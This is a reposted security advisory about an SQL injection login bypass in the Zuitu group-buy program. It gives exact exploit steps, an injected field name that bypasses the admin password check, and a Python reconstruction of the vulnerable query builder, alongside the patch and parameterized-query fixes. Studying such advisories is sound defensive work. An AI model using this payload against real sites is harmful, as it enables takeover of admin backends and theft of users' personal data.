Zuitu group-buy program: latest SQL injection exploit and fix - Vulnerability Warning - Heibai Security Net (黑吧安全网)

ID MYHACK58:62201233670
Type myhack58
Reporter Anonymous (佚名)
Modified 2012-04-15T00:00:00


Recently a high-risk vulnerability was found in the Zuitu (最土) group-buy program 3.0_20111207. Using the exploit method below, an intruder can pull a large amount of user and order information out of a Zuitu-based group-buy site in about ten seconds.

Because Zuitu is a group-buying program, its database holds users' email addresses and phone numbers, and often their delivery addresses as well. Once someone else obtains this private information, it can cause the site's users a great deal of trouble.

Security engineers at 360 analysed it as "a quite typical and also very classic array key variable pollution vulnerability". Because the Zuitu site-building program does not filter its input strictly, an attacker can submit malicious code, control the program flow, bypass the login check and go straight into the site's admin backend.

The test method is as follows:

  1. Open the site in the Opera browser at the default backend address: manage/login.php

  2. Right-click and view the page source. Find the following code:


<label for="manage-login">login</label>

<input type="text" size="30" name="username" id="manage-username" datatype="require" require="true" />


  3. Change name="username" to name="username[=0x7c or manager=1#]" and save the edited page in the browser (Opera lets you apply the change directly from its source view).

  4. Log in to the backend with username s and password s.

The square brackets in the field name make PHP deliver $_POST['username'] as an array whose only key is the payload. The login code passes that array on into the query, and because the array key reaches the SQL without any escaping, the WHERE clause degenerates into "... or manager=1" while the trailing # comments out the rest of the statement, including the password check. The query therefore matches any account flagged as a manager, regardless of the credentials typed.

Because the Zuitu backend can back up the database straight to a local file, once an attacker is inside the backend, and the server has not restricted download permission on the backup files, the entire database can be downloaded. The threat to users' information is therefore considerable.

How to fix the above vulnerability:

  1. Upgrade Zuitu to the latest version, ZuituGo_CV2.0_20111231;

  2. If you do not want to download the large source package for the upgrade, you can apply the following patch instead: in Include/classes/ZUser.class.php find the login-check function defined as "static public function GetLogin($email, $unpass, $en=true) {" and add the line "if(is_array($email)) return array();" as the first statement of its body. Rejecting an array here stops the polluted key from ever reaching the query.

  3. Restrict download permission on the backup files that the backend's database backup writes to the server.

  4. Add a CAPTCHA to the backend login.
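To make the mechanism and the fix concrete, the following Python script is an added example (not code from this page or from the Zuitu project). It reconstructs the pattern the 360 analysis describes: PHP turns a bracketed field name into an array, and a query-condition builder that treats array keys as SQL operators splices the key into the statement unescaped. The builder shape, the user table, the password hashing and the sample accounts are assumptions made for the demo. It runs against an in-memory SQLite database, which has no MySQL-style "#" comment, so the payload ends in "-- " instead of "#"; the injected structure is otherwise the same as on the page.

```python
import hashlib
import re
import sqlite3
from urllib.parse import unquote_plus, urlencode


def gen_password(plain):
    # Stand-in for the program's own password hashing (assumed, not Zuitu's GenPassword).
    return hashlib.sha256(plain.encode()).hexdigest()


def parse_php_post(body):
    """Decode a urlencoded POST body the way PHP fills $_POST: a field named
    name[key]=v arrives as {'name': {'key': 'v'}} instead of a plain string."""
    post = {}
    for pair in body.split("&"):
        if not pair:
            continue
        raw_key, _, raw_val = pair.partition("=")
        key, val = unquote_plus(raw_key), unquote_plus(raw_val)
        m = re.fullmatch(r"([^\[]+)\[(.*)\]", key)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = val
        else:
            post[key] = val
    return post


def escape_value(v):
    # Values are quoted and escaped; keys never are (assumed shape of the builder).
    return str(v).replace("'", "''")


def build_where(condition):
    """Reconstructed operator-as-array-key condition builder (an assumption
    about the pattern, not Zuitu's own code): a scalar yields col='v'; an
    array yields col<key>'v' for every key, with the key spliced in raw."""
    parts = []
    for col, val in condition.items():
        if isinstance(val, dict):
            for op, v in val.items():
                parts.append(f"{col}{op}'{escape_value(v)}'")
        else:
            parts.append(f"{col}='{escape_value(val)}'")
    return " AND ".join(parts)


def make_db():
    # Constructed sample user table; manager=1 marks a backend administrator.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, password TEXT, manager INTEGER)")
    conn.executemany(
        "INSERT INTO user (email, password, manager) VALUES (?, ?, ?)",
        [("admin@example.com", gen_password("correct-horse"), 1),
         ("alice@example.com", gen_password("alice-secret"), 0)],
    )
    return conn


def get_login_vulnerable(conn, email, unpass):
    """Unpatched behaviour: whatever arrived in $_POST['username'] goes straight
    into the condition builder, array or not."""
    where = build_where({"email": email, "password": gen_password(unpass)})
    return conn.execute(f"SELECT id, email, manager FROM user WHERE {where}").fetchone()


def get_login_patched(conn, email, unpass):
    """The advisory's one-line fix: if(is_array($email)) return array();"""
    if isinstance(email, dict):
        return None
    return get_login_vulnerable(conn, email, unpass)


def get_login_parameterized(conn, email, unpass):
    """Stronger form: reject non-string input and bind values as parameters,
    so nothing from the request is ever concatenated into the SQL text."""
    if not isinstance(email, str) or not isinstance(unpass, str):
        return None
    sql = "SELECT id, email, manager FROM user WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, gen_password(unpass))).fetchone()


# Constructed attack body: what the browser sends after the field is renamed
# to username[=0x7c or manager=1-- ] and the form is submitted with s / s.
PAYLOAD = "=0x7c or manager=1-- "
ATTACK_BODY = urlencode({f"username[{PAYLOAD}]": "s", "password": "s"})


def demo():
    conn = make_db()
    post = parse_php_post(ATTACK_BODY)
    return {
        "post": post,
        "where": build_where({"email": post["username"], "password": gen_password(post["password"])}),
        "vulnerable": get_login_vulnerable(conn, post["username"], post["password"]),
        "patched": get_login_patched(conn, post["username"], post["password"]),
        "parameterized": get_login_parameterized(conn, post["username"], post["password"]),
        "legit": get_login_parameterized(conn, "admin@example.com", "correct-horse"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running it shows the generated WHERE clause "email=0x7c or manager=1-- 's' AND password='...'" and the vulnerable login returning the administrator row for credentials s / s, while both the is_array guard and the parameterized version return nothing. The guard from the advisory closes this entry point; binding values as parameters and never letting request data shape the SQL text is what removes the class of bug.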

Parts of this fix were drawn from online sources; verify their feasibility yourself before relying on them.

This article is for study and reference only; please do not use it for destructive purposes.